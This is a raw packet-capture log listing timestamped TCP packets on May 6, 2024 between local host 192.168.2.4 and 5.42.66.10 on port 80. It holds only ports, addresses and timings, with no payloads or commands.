May 6, 2024 07:53:05.027770996 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027781010 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027782917 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027793884 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027798891 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027806044 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027817965 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027825117 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027829885 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027842045 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027851105 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027853012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027864933 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027868986 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027875900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027887106 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027889013 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027900934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027913094 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027913094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027926922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027936935 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027937889 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027950048 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027955055 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027961016 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027982950 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027983904 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027995110 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028004885 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.028007984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028017998 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.028021097 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028033018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028043032 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028048038 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.028057098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028069019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028081894 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028081894 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.028081894 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.028094053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028111935 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028119087 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.028125048 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028131008 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.028150082 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.028170109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028175116 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.028182030 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028192997 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028204918 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028213978 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.028215885 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028228045 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028239012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028239965 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.028251886 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028261900 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.028264999 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028275013 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028285980 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028290987 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.028299093 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028309107 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.028311014 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028321981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028322935 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.028347015 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.028363943 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028373003 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.028378963 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028410912 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.028418064 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028429985 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028439999 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028460979 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.028485060 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.028558969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028574944 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028585911 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028598070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028604031 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.028609037 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028620958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028629065 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.028633118 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028645039 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028652906 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.028656006 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.028671026 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.028697014 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.028721094 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.028973103 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.029042006 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.654967070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.655167103 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.908155918 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.908170938 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.908256054 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:06.161195040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.161212921 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.161225080 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.161237955 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.161253929 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.161267042 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.161326885 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:06.161375999 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:06.414191008 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.414207935 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.414227962 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.414239883 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.414264917 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.414278984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.414289951 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.414303064 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.414371014 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.414383888 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.414388895 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:06.414390087 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:06.414397001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.414411068 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.414413929 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:06.414438963 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:06.414460897 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:06.667489052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.667505026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.667515993 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.667540073 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.667553902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.667565107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.667576075 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.667593956 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.667614937 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:06.667664051 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:06.667886972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.667929888 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:06.668018103 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.668032885 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.668045044 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.668056011 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.668065071 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:06.668070078 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.668081999 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.668086052 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:06.668095112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.668124914 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:06.668124914 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:06.920456886 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.920480013 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.920542002 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.920555115 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.920598984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.920610905 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.920622110 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.920633078 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.920703888 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:06.920753956 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:06.920756102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.920768976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.920778990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.920790911 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.920804024 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.920816898 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.920823097 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:06.920829058 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.920840979 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.920852900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.920864105 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.920906067 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.920917988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.920975924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.920989037 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.920990944 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:06.921000004 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.921010971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.921034098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.921046019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.921057940 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:06.921058893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.921071053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.921120882 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:06.921133041 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.921144962 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.921155930 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.921168089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.921183109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.921194077 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.921197891 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:06.921205044 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.921217918 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.921227932 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.921243906 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.921256065 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.921257973 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:06.921268940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.921281099 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.921292067 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:06.921329021 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:06.921384096 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.175880909 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.175895929 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.175914049 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.175995111 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.176002026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.176014900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.176027060 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.176039934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.176045895 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.176074982 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.176116943 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.176127911 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.176140070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.176151037 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.176157951 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.176162958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.176177025 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.176198006 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.176250935 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.176263094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.176274061 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.176286936 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.176306009 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.176306963 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.176312923 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.176317930 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.176332951 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.176354885 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.176357985 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.176400900 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.176552057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.176565886 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.176575899 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.176588058 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.176592112 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.176599979 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.176605940 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.176611900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.176623106 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.176624060 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.176632881 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.176635027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.176647902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.176651001 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.176671982 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.176672935 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.176683903 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.176692963 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.176702976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.176713943 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.176714897 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.176727057 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.176727057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.176738977 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.176739931 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.176757097 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.176757097 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.176779985 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.176789999 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.176801920 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.176811934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.176831007 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.176851034 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.428760052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.428837061 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.428850889 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.428857088 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.428906918 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.428919077 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.428920031 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.428930998 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.428942919 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.428956985 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.428977966 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.429013968 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429027081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429038048 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429049969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429054976 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.429063082 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429076910 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429079056 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.429089069 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429100990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429106951 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.429120064 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429131985 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429132938 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.429142952 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429151058 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.429156065 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429167986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429176092 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.429183960 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429195881 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429198027 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.429208040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429219961 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429219961 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.429230928 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429241896 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429246902 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.429254055 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429265976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429266930 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.429279089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429290056 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.429318905 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.429332018 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.429358959 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429377079 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429388046 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429399014 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429404020 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.429410934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429420948 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.429423094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429428101 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.429435015 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429445982 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429446936 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.429456949 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429470062 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429471016 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.429481030 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429486036 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.429493904 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429503918 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429512024 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.429517031 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429527998 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.429536104 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.429553986 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.429565907 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.681977987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682024002 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682024956 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.682035923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682048082 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682060003 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682061911 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.682071924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682084084 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682096958 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.682137966 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.682140112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682152987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682164907 CEST	80	49741	5.42.66.10	192.168.2.4
